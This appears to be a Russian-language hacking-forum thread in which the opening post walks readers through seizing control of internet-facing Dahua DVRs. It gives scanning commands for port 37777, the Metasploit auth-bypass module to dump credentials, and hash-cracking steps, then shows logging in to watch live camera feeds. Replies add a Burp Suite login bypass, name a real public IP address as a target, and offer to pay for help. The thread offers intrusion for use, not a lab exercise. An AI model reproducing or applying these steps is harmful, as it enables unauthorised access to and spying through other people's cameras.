Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Статьи (https://forum.antichat.xyz/forumdisplay.php?f=30)
-   -   Перехват ключей DVR или Dahua Bypass (https://forum.antichat.xyz/showthread.php?t=462621)

Kevin Shindel 05.05.2018 20:31

Приветствую обиталей Ачата.

Давно я не писал годноты.... почитал форум и понял что нужно что то толковое двинуть.

Сегодня я вам поведаю как подчинить под свой контроль регистраторы фирмы DAHUA.

Для начала нам нужны след. иснтрументы.

+ nmap

+ metasploit

+ john the ripper

+ Dahua SmartPSS (скачать можно с офф.сайта)

Сначала нам нужно найти собственно сами регистраторы в вебе. Если вы хоть раз настраивали регистратор то знаете что для корректной работы, нужно пробрасывать порт 37777 и 80.

80 порт необходим для просмотра виедфайлов\архива с помощью браузера (так как 80 порт используется для настройки роутера, часто его меняют на 8080,1080, или 81)

37777 порт для проприетарного софта.

Итак искать мы будем открытый порт 37777 (потом обьясню почему не 80 и 8080)

Итак запускаем nmap\masscan для поиска.

команда для нмапа следующая:

root@kali:nmap -n -Pn -T4 -sS -p37777 --open 192.168.1.0/24 -oG 37777_open.txt


если у вас есть список ИПов в стандарте CIRD

если по религиозным убеждениям используете масскан тогда печатайте так...

root@kali:masscan --rate=500 -p37777 192.168.1.0/24 -oG 37777.txt

можно сканировать из внешнего файла

root@kali: nmap -n -Pn -T4 -sS -p37777 --open -iL /home/file.txt -oG 37777_open.txt

для масскана аналогично

root@kali: masscan --rate=500 -p37777 -iL /home/file.txt -oG 37777.txt

После скана нужно "почистить" файлы, оставить только голые ИПы иначе метасплойт пошлёт на йух.

root@kali:cat 37777.txt | sort | uniq > 37777_clear.txt

Окей... мы насканили допустим 30-40 регистраторов, запускаем метасплойт.

root@kali:service postgresql start

root@kali:msfconsole

root@kali: use auxiliary/scanner/misc/dahua_dvr_auth_bypass


дальше сканер нужно настроить....

root@kali: set ACTION USER

root@kali: set THREADS 25


теперь маленькая хитрость, что бы не вбивать ипы вручную просто скормим весь файл метайслойт через спец.строку

root@kali: set RHOSTS file:37777_clear.txt

ждём....

После того как сканер закончил свою работу, копируем лут и сохраняем в тесктовый файл.

Мы получили логины и пароли в зашифрованом виде ( не переживайте крипт там очень простой "Dahua [MD5 32/64]" )

(Однако недавно обратил внимание что DAHUA начала использовать хэш MD5, если таковой появится в выводе метасплойт то его возможно сбрутить через кота)

root@kali:hashcat -m 0 -a 0 hash.txt -o cracked.txt /home/wordlist.txt

Копируем хэши в отдельный файл и готовим для брута Джоном, для кота я не нашел подержки.

допустим наш хэш "4WzwxXxm" нужно добавить перед ним префикс $dahua$, хэш будет иметь вид $dahua$4WzwxXxm и скармливаем Джону.

root@kali: john hash.txt

Если пароль не сложный то он быстро найдётся (по собственному опыту на регистраторе минимум 2-4 учётки а то и больше и взламывается сразу почти все)

После удачного брута проверяем пароли...

root@kali: john hash.txt --show

После того как мы подобрали пасс можно поступить двумя способами...

Просканить данный ИП на наличие проброшеного порта регистратора (если таковой имеется) и зайти через ВЕБ или ...

Если есть WIN под рукой установить оригинальный софт от производителя DAHUA PSS.

сцыль "http://ru.dahuasecurity.com/ru/download_2.html"

я скачивал версию "Smart_PSS_International_IS_V2.00.1.R.20170225 "

Устанавливаем софт, во время первого запуска он потребует установить пароль... указываем любой... 1234 \ 0000 не важно. (просто в качестве меры безопасности)

Ставим галку сохранить пароль и больше он запрашивается не будет.

https://cdn1.savepice.ru/uploads/201...96b25-prev.jpg

https://cdn1.savepice.ru/uploads/201...10370-prev.jpg

Далее идём во вкладку HOME PAGE -> DEVICES

https://cdn1.savepice.ru/uploads/201...c33e5-prev.jpg

Жмём ADD, и указываем необходимые данные и жмём еще раз ADD.

https://cdn1.savepice.ru/uploads/201...90f65-prev.jpg

Переходим обратно в главное меню, выбираем LIVEVIEV и раскрываем список камер справа...

https://cdn1.savepice.ru/uploads/201...ab7b2-prev.jpg

Бонусом запилил видосик на скорую руку...

https://yadi.sk/i/9E8pg8Iq3VPM6T

Dimon_blin 26.07.2019 09:22

Цитата:

Сообщение от shinZa
shinZa said:

(Однако недавно обратил внимание что DAHUA начала использовать хэш MD5, если таковой появится в выводе метасплойт то его возможно сбрутить через кота)

Там вот такое шифрование:

Downloaded MD5 hash: 94DB0778856B11C0D0F5455CCC0CE074

Random value to encrypt with: 1958557123

Built password: admin:1958557123:94DB0778856B11C0D0F5455CCC0CE074

MD5 generated password: 2A5F4F7E1BB6F0EA6381E4595651A79E

p.s. 14/02/2019: там соленый md5 хеш по маске брутится, для маски надо логин и серийнк камеры


Если пароль не сложный! А если сложный, то не надо брутить, логинемся с burpsuite, но только по веб морде пробивая по GEN2,GEN3

https://cdn1.savepice.ru/uploads/201...1195f-full.jpg


ДД, можно поконкретнее про "логинемся с burpsuite, но только по веб морде пробивая по GEN2,GEN3". Если не затруднит, напишите плиз, как это делается по порядку. (Kali Linux). Можно в личку.

Dimon_blin 26.07.2019 09:29

Было бы здорово, если бы подсказали какие-нибудь онлайн-сервисы по расшифровки паролей к камерам дахуа вида $dahua$y11Ko7d0. На компе с кали уже 3 неделю john брутит около 100 паролей и около 70 - без результата.

shinZa 26.07.2019 14:28

Цитата:

Сообщение от Dimon_blin
Dimon_blin said:

ДД, можно поконкретнее про "логинемся с burpsuite, но только по веб морде пробивая по GEN2,GEN3". Если не затруднит, напишите плиз, как это делается по порядку. (Kali Linux). Можно в личку.

веб-морда дахуа отправляет зарос пароля хешом его в burpsuite и подменяешь.

Dimon_blin 26.07.2019 14:50

Можно по действиям про burpsuite(если со скриншотами - вообще бы круто было иили коротенькое видео)? На примере 69.138.119.231. Запустил burpsuite, дальше куда что?



Может глупый вопрос, но в инете про такую реализацию инфы не нашел.

shinZa 26.07.2019 20:33

Цитата:

Сообщение от Dimon_blin
Dimon_blin said:

Можно по действиям про burpsuite(если со скриншотами - вообще бы круто было иили коротенькое видео)? На примере
69.138.119.231
. Запустил burpsuite, дальше куда что? Может глупый вопрос, но в инете про такую реализацию инфы не нашел.

здесь инфа https://blog.csdn.net/nixawk/article/details/62892129

Dimon_blin 30.07.2019 09:21

Благодарю за ссылочку, но там очень коротко и не совсем понятен сам процесс(особенно через переводчик). Поэтому прошу описать процесс по шагам с фото или краткий видео-ролик(как для чайника), чтобы иметь понимание того, что делаешь и почему.

shinZa 31.07.2019 11:22

Это ты отсюда пришел ???

Dimon_blin 31.07.2019 11:29

Нет, читал статью, увидел коммент с поправкой про мд5, решил спросить.

JustGo13 19.01.2020 00:08

ребят кто может вытащит хеш файл с конкретного двр к которому имеется доступ только через вай фай напишите заплачу за обучение


Время: 19:35